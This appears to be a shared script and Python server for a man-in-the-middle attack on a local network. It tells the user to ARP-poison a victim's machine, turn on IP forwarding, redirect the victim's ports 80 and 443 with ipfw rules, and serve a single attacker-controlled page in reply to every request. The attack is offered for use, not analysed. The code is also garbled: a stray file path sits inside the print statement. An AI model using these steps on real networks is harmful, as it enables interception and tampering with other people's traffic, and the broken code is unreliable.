A script that man-in-the-middle's user's traffic on a network (intercepts it and allows you to play with it, but only HTTP traffic of course).
read more man-in-the-middle.sh
#will need to convince victim that we're the default gateway using ARP poisoning
(arp-poison.py)
#then enable IP forwarding so that their traffic ends up going to the router via
sudo sysctl -w net.inet.ip.forwarding=1
#best way to start a server is to use the simple command below. Will open at 0.0.0.0:8000:
python -m SimpleHTTPServer 8000
#alternatively, you can use the server.py file. It redirects all requests to index.html so you may have better
#results with it.
#needed to forward all traffic on port 80 and 443 to go to my local server
sudo ipfw add fwd 192.168.1.139,8000 tcp from any to any 80 in via en0
sudo ipfw add fwd 192.168.1.139,8000 tcp from any to any 443 in via en0
#some bug made it so that you had to enable some flag that allowed this kind of forwarding
/Library/Preferences/SystemConfiguration/com.apple.Boot.plist
#and added
net.inet.ip.scopedroute=0
server.py
#!/usr/bin/python
import SimpleHTTPServer
import SocketServer
PORT = 8000
class CustomHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def __init__(self, req, client_addr, server):
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self, req, client_addr, server)
def do_GET(self):
#always redirect to the homepage
self.path = "/index.html"
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
class MyTCPServer(SocketServer.ThreadingTCPServer):
allow_reuse_address = True
if __name__ == '__main__':
httpd = MyTCPServer(('0.0.0.0', PORT), CustomHandler)
httpd.allow_reuse_address = True
print "Serving at port", PO/Users/pooch/Documents/Independent/Sniffing Resources & Network Hacks/middleServer/server.pyRT
httpd.serve_forever()